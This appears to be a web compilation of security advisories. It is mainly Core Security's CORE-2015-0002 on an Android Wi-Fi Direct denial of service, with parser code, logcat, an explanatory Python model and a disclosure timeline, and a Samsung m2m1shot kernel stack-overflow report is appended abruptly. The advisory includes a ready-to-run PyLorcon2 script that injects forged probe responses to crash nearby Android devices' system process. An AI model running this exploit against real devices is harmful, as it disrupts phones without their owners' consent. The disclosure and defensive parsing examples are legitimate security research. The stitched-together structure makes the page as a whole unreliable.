                match = threeTokenPattern.matcher(string);
                if (!match.find()) {
                    throw new IllegalArgumentException("Malformed supplicant event");
                }
                deviceAddress = match.group(1);
                return;
            default:
                match = detailedDevicePattern.matcher(string);
                if (!match.find()) {
                    throw new IllegalArgumentException("Malformed supplicant event");
                }

                deviceAddress = match.group(3);
                primaryDeviceType = match.group(4);
                deviceName = match.group(5);
                wpsConfigMethodsSupported = parseHex(match.group(6));
                deviceCapability = parseHex(match.group(7));
                groupCapability = parseHex(match.group(8));
                if (match.group(9) != null) {
                    String str = match.group(10);
                    wfdInfo = new WifiP2pWfdInfo(parseHex(str.substring(0,4)),
                            parseHex(str.substring(4,8)),
                            parseHex(str.substring(8,12)));
                }
                break;
        }

        if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
            status = AVAILABLE;
        }
    }
[...]
-----/
On some Android devices, processing a probe response frame whose WiFi-Direct
(P2P) information element carries a Device Name attribute with specific bytes
(the PoC below uses "fafa\xFA\xFA"; 0xFA is not valid UTF-8) results in a
malformed supplicant event string, and the WifiP2pDevice constructor throws an
IllegalArgumentException. WifiMonitor does not handle this exception, and it
runs inside the system process, so the exception is fatal and the Android
system restarts. Probe responses are unauthenticated management frames: the
attacker only needs to be within radio range of the target, with no association
or authentication required.
Below is partial logcat output from a Samsung SM-T310 running Android 4.2.2.
Note the garbled addresses (00.EF.00) and the missing name= key in the logged
event: by the time it reaches the Java parser it no longer matches
detailedDevicePattern.
/-----
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬' config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS: WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException: Malformed supplicant event
E/AndroidRuntime( 2129):    at android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129):    at android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129):    at android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o /data/log/dumpstate_sys_error
-----/
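As an added example, not code from the advisory or from AOSP: the detailedDevicePattern above ported unchanged to Python's re module and run over the well-formed event from the pattern's own doc comment and over the malformed event copied from the logcat above. parse_device_found models only the default branch of the constructor (the one-, two- and three-token patterns are elided on the page), MalformedEvent stands in for IllegalArgumentException, and the two monitor loops contrast the vulnerable shape, where the exception escapes the event thread, with the guarded shape, where an unparseable event is dropped and later events are still served. The function and class names are the example's own.

```python
import re

# detailedDevicePattern from WifiP2pDevice.java, ported verbatim to Python's re.
# Group numbering is the same as in Java: 3 = p2p_dev_addr, 4 = pri_dev_type,
# 5 = name, 6..8 = hex fields, 9/10 = the optional wfd_dev_info.
DETAILED_DEVICE_PATTERN = re.compile(
    r"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"(\d+ )?"
    r"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"pri_dev_type=(\d+-[0-9a-fA-F]+-\d+) "
    r"name='(.*)' "
    r"config_methods=(0x[0-9a-fA-F]+) "
    r"dev_capab=(0x[0-9a-fA-F]+) "
    r"group_capab=(0x[0-9a-fA-F]+)"
    r"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
)


class MalformedEvent(ValueError):
    """Stands in for the IllegalArgumentException the Java constructor throws."""


def parse_device_found(event):
    """Model of the 'default:' branch of the WifiP2pDevice constructor.

    Only the multi-token P2P-DEVICE-FOUND form is modelled; the one-, two- and
    three-token forms use patterns the advisory does not show.
    """
    tokens = re.split(r"[ \n]", event)          # Java: string.split("[ \n]")
    if len(tokens) < 4:
        raise MalformedEvent("short event form not modelled here")
    m = DETAILED_DEVICE_PATTERN.search(event)   # Java Matcher.find() is an unanchored search
    if m is None:
        raise MalformedEvent("Malformed supplicant event")
    wfd_info = None
    if m.group(9) is not None:
        s = m.group(10)
        wfd_info = (int(s[0:4], 16), int(s[4:8], 16), int(s[8:12], 16))
    return {
        "device_address": m.group(3),
        "primary_device_type": m.group(4),
        "device_name": m.group(5),               # (.*) accepts whatever the event carried
        "wps_config_methods": int(m.group(6), 16),
        "device_capability": int(m.group(7), 16),
        "group_capability": int(m.group(8), 16),
        "wfd_info": wfd_info,
        "available": tokens[0].startswith("P2P-DEVICE-FOUND"),
    }


def monitor_unguarded(events):
    """Vulnerable shape: the parse error escapes the loop. In the real
    WifiMonitor thread that uncaught exception is fatal for the system process."""
    return [parse_device_found(e) for e in events]


def monitor_guarded(events):
    """Hardened shape: an unparseable event is dropped, later events are still served."""
    devices, dropped = [], []
    for e in events:
        try:
            devices.append(parse_device_found(e))
        except MalformedEvent:
            dropped.append(e)
    return devices, dropped


def raises_malformed(event):
    """True if the constructor model rejects the event."""
    try:
        parse_device_found(event)
    except MalformedEvent:
        return True
    return False


# Well-formed event, taken from the pattern's doc comment in WifiP2pDevice.java.
GOOD_EVENT = ("P2P-DEVICE-FOUND 00:18:6b:de:a3:6e p2p_dev_addr=00:18:6b:de:a3:6e "
              "pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E' config_methods=0x188 "
              "dev_capab=0x21 group_capab=0x9")
# Malformed event, copied from the Samsung SM-T310 logcat above: the addresses are
# garbled and the name= key is gone, so the pattern cannot match.
BAD_EVENT = ("P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 "
             "'fa\u00ac\u00ac' config_methods=0x188 dev_capab=0x21 group_capab=0x0")

if __name__ == "__main__":
    print(parse_device_found(GOOD_EVENT))
    print("unguarded monitor would die on the logcat event:", raises_malformed(BAD_EVENT))
    devices, dropped = monitor_guarded([GOOD_EVENT, BAD_EVENT])
    print("guarded monitor: %d parsed, %d dropped" % (len(devices), len(dropped)))
```

Running it shows that the guarded loop keeps the well-formed device and drops the logcat event, whereas monitor_unguarded([GOOD_EVENT, BAD_EVENT]) raises on the second event, which is the behaviour that takes down the system process on the affected devices.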
8.1. *Proof of Concept*
This PoC was implemented using the open source library Lorcon [2] and
PyLorcon2 [3], a Python wrapper for Lorcon. It injects a forged probe response,
addressed to the target, carrying a P2P IE whose Device Name is the byte
sequence "fafa\xFA\xFA". The interface must support monitor mode and injection.
/-----
#!/usr/bin/env python
# Python 2 / PyLorcon2: injects a crafted Wi-Fi Direct probe response at the target.
import sys
import time
import struct

import PyLorcon2


def get_probe_response(source, destination, channel):
    frame = str()
    # 802.11 management header: type/subtype 0x50 = probe response
    frame += "\x50\x00"    # Frame Control
    frame += "\x00\x00"    # Duration
    frame += destination   # Address 1 (receiver: the target)
    frame += source        # Address 2 (transmitter)
    frame += source        # Address 3 (BSSID)
    frame += "\x00\x00"    # Sequence Control
    # Fixed fields
    frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
    frame += "\x64\x00"    # Beacon Interval
    frame += "\x30\x04"    # Capabilities Information
    # SSID IE: Wi-Fi Direct group SSIDs start with "DIRECT-"
    frame += "\x00"
    frame += "\x07"
    frame += "DIRECT-"
    # Supported Rates IE
    frame += "\x01"
    frame += "\x08"
    frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
    # DS Parameter Set IE
    frame += "\x03"
    frame += "\x01"
    frame += struct.pack("B", channel)
    # P2P IE: vendor specific (0xDD), length 0x27, WFA OUI 50:6F:9A, OUI type 0x09
    frame += "\xDD"
    frame += "\x27"
    frame += "\x50\x6F\x9A"
    frame += "\x09"
    # P2P Capability attribute (ID 2; attribute lengths are little-endian)
    frame += "\x02"        # ID
    frame += "\x02\x00"    # Length
    frame += "\x21\x00"    # Device Capability 0x21, Group Capability 0x00
    # P2P Device Info attribute (ID 13)
    frame += "\x0D"        # ID
    frame += "\x1B\x00"    # Length (27)
    frame += source        # P2P Device address
    frame += "\x01\x88"    # Config Methods 0x0188
    frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"  # Primary Device Type 10-0050F204-5
    frame += "\x00"        # Number of Secondary Device Types
    # WPS Device Name attribute (type 0x1011, length 6): the trigger
    frame += "\x10\x11"
    frame += "\x00\x06"
    frame += "fafa\xFA\xFA"  # 0xFA 0xFA is not valid UTF-8
    return frame


def str_to_mac(address):
    return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage:"
        print "  poc.py <iface> <target>"
        print "Example:"
        print "  poc.py wlan0 00:11:22:33:44:55"
        sys.exit(-1)

    iface = sys.argv[1]
    destination = str_to_mac(sys.argv[2])

    context = PyLorcon2.Context(iface)
    context.open_injmon()   # monitor mode with injection

    # The injection interface is assumed to already be tuned to this channel.
    channel = 1
    source = str_to_mac("00:11:22:33:44:55")

    frame = get_probe_response(source, destination, channel)

    print "Injecting PoC."
    for i in range(100):
        context.send_bytes(frame)
        time.sleep(0.100)
-----/
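As an added example that is not part of the advisory's PoC: the same probe response rebuilt as Python 3 bytes (constructed input, with the Device Name made a parameter) and then parsed the way a receiver would, walking the 802.11 IEs to the WFA P2P vendor IE, the P2P attributes to Device Info, and the WPS TLVs inside it to the Device Name. It shows exactly where the 0xFA bytes sit in the frame and adds device_name_is_clean, the validation a hardened parser or a wireless IDS could apply before the name is turned into text; the quote/newline part of that check is defensive and goes beyond what the advisory demonstrates. Function and constant names are the example's own; no radio is needed to run it.

```python
import struct

WFA_OUI = b"\x50\x6f\x9a"
P2P_OUI_TYPE = 0x09
P2P_ATTR_CAPABILITY = 0x02
P2P_ATTR_DEVICE_INFO = 0x0D
WPS_ATTR_DEVICE_NAME = 0x1011


def build_probe_response(source, destination, channel, device_name):
    """Same frame layout as the PoC above, as bytes; device_name is the raw WPS
    Device Name value (constructed test input, not captured traffic)."""
    hdr = b"\x50\x00" + b"\x00\x00" + destination + source + source + b"\x00\x00"
    fixed = b"\x00" * 8 + b"\x64\x00" + b"\x30\x04"          # timestamp, interval, capabilities
    ies = b"\x00\x07" + b"DIRECT-"                            # SSID
    ies += b"\x01\x08" + b"\x8c\x12\x98\x24\xb0\x48\x60\x6c"  # Supported Rates
    ies += b"\x03\x01" + struct.pack("B", channel)            # DS Parameter Set
    dev_info = source + b"\x01\x88" + b"\x00\x0a\x00\x50\xf2\x04\x00\x05" + b"\x00"
    dev_info += struct.pack(">HH", WPS_ATTR_DEVICE_NAME, len(device_name)) + device_name
    attrs = struct.pack("<BH", P2P_ATTR_CAPABILITY, 2) + b"\x21\x00"
    attrs += struct.pack("<BH", P2P_ATTR_DEVICE_INFO, len(dev_info)) + dev_info
    body = WFA_OUI + bytes([P2P_OUI_TYPE]) + attrs
    ies += b"\xdd" + struct.pack("B", len(body)) + body       # vendor-specific (P2P) IE
    return hdr + fixed + ies


def mac_str(addr):
    return ":".join("%02x" % b for b in addr)


def iter_ies(body):
    """Walk 802.11 information elements: 1-byte ID, 1-byte length, value."""
    off = 0
    while off + 2 <= len(body):
        eid, ln = body[off], body[off + 1]
        off += 2
        if off + ln > len(body):
            raise ValueError("truncated IE %#x" % eid)
        yield eid, body[off:off + ln]
        off += ln


def iter_p2p_attrs(payload):
    """Walk P2P attributes: 1-byte ID, 2-byte little-endian length, value."""
    off = 0
    while off + 3 <= len(payload):
        aid, ln = struct.unpack_from("<BH", payload, off)
        off += 3
        if off + ln > len(payload):
            raise ValueError("truncated P2P attribute %#x" % aid)
        yield aid, payload[off:off + ln]
        off += ln


def parse_device_info(attr):
    """P2P Device Info: address(6) config_methods(2 BE) primary type(8)
    n_secondary(1) secondary types(8 each) then WPS TLVs (2-byte BE type and length)."""
    if len(attr) < 17:
        raise ValueError("short Device Info attribute")
    cfg, cat, oui, sub = struct.unpack_from(">HH4sH", attr, 6)
    off = 17 + 8 * attr[16]
    name = None
    while off + 4 <= len(attr):
        t, ln = struct.unpack_from(">HH", attr, off)
        off += 4
        if off + ln > len(attr):
            raise ValueError("truncated WPS attribute %#x" % t)
        if t == WPS_ATTR_DEVICE_NAME:
            name = attr[off:off + ln]
        off += ln
    return {
        "address": mac_str(attr[:6]),
        "config_methods": cfg,
        "primary_device_type": "%d-%s-%d" % (cat, oui.hex().upper(), sub),  # supplicant form
        "device_name": name,
    }


def parse_p2p_probe_response(frame):
    """Return the P2P Device Info carried by a probe response, or None if absent."""
    if len(frame) < 36 or frame[0] != 0x50:
        raise ValueError("not a probe response")
    for eid, val in iter_ies(frame[36:]):                     # 24-byte header + 12 fixed bytes
        if eid == 0xDD and val[:4] == WFA_OUI + bytes([P2P_OUI_TYPE]):
            for aid, attr in iter_p2p_attrs(val[4:]):
                if aid == P2P_ATTR_DEVICE_INFO:
                    info = parse_device_info(attr)
                    info["transmitter"] = mac_str(frame[10:16])
                    return info
    return None


def device_name_is_clean(name):
    """Valid UTF-8, printable, and unable to break the quoted name='...' token of
    the supplicant event. The quote/newline part is defensive, beyond the advisory."""
    try:
        text = name.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(c.isprintable() for c in text) and "'" not in text and "\n" not in text


if __name__ == "__main__":
    frame = build_probe_response(bytes.fromhex("001122334455"),
                                 bytes.fromhex("665544332211"), 1, b"fafa\xfa\xfa")
    info = parse_p2p_probe_response(frame)
    print(info, "clean name:", device_name_is_clean(info["device_name"]))
```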
9. *Report Timeline*
. 2014-09-26:
Core Security contacts Android security team to inform them that
a vulnerability has been found in Android. Core Security sends a draft
advisory with technical details and PoC files.
. 2014-09-29:
Android Security Team acknowledges reception of the advisory.
. 2014-09-30:
Core Security notifies that the tentative publication date is
set for October 20th, 2014.
. 2014-09-30:
Android Security Team acknowledges.
. 2014-10-16:
Core Security requests a status update.
. 2014-10-16:
Android Security Team responds that they have classified the
vulnerability as low severity and do not currently have a timeline for
releasing a fix.
. 2014-10-20:
Core Security does not completely agree with the vulnerability
classification and reschedules the publication of the advisory.
. 2014-10-16:
Android Security Team acknowledges and restates its position
that it does not currently have a timeline for releasing a fix.
. 2015-01-06:
Core Security requests a status update.
. 2015-01-12:
Core Security asks for confirmation of reception of the previous
email.
. 2015-01-16:
Android Security Team acknowledges and responds that they do not
currently have a timeline for releasing a fix.
. 2015-01-19:
Core Security notifies that vendor cooperation is needed in
order to keep this process coordinated. If vendor refuses to provide the
requested information the advisory will be released tagged as 'user
release'. The advisory is re-scheduled for January 26th, 2015.
. 2015-01-20:
Android Security Team acknowledges and responds that they do not
currently have a timeline for releasing a fix.
. 2015-01-26:
The advisory CORE-2015-0002 is published.
10. *References*
[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/
[2] - Lorcon site. https://code.google.com/p/lorcon
[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2014 Core Security and (c) 2014 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
Source: https://code.google.com/p/google-security-research/issues/detail?id=493
The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server.
The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot:
static long m2m1shot_compat_ioctl32(struct file *filp,
                                    unsigned int cmd, unsigned long arg)
{
    ...
    switch (cmd) {
    case COMPAT_M2M1SHOT_IOC_PROCESS:
    {
        struct compat_m2m1shot data;
        struct m2m1shot_task task;
        int i, ret;

        memset(&task, 0, sizeof(task));

        if (copy_from_user(&data, compat_ptr(arg), sizeof(data))) {
            dev_err(m21dev->dev,
                    "%s: Failed to read userdata\n", __func__);
            return -EFAULT;
        }
        ...
        for (i = 0; i < data.buf_out.num_planes; i++) {
            task.task.buf_out.plane[i].len =
                            data.buf_out.plane[i].len;
            ...
        }
In this code snippet, data.buf_out.num_planes is an attacker-controlled u8 value that is never bounds checked, while task.task.buf_out.plane is a fixed-size array of three elements on the kernel stack; a num_planes value larger than three makes the loop write past the end of that array, a stack buffer overflow with attacker-controlled lengths.
Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38555.zip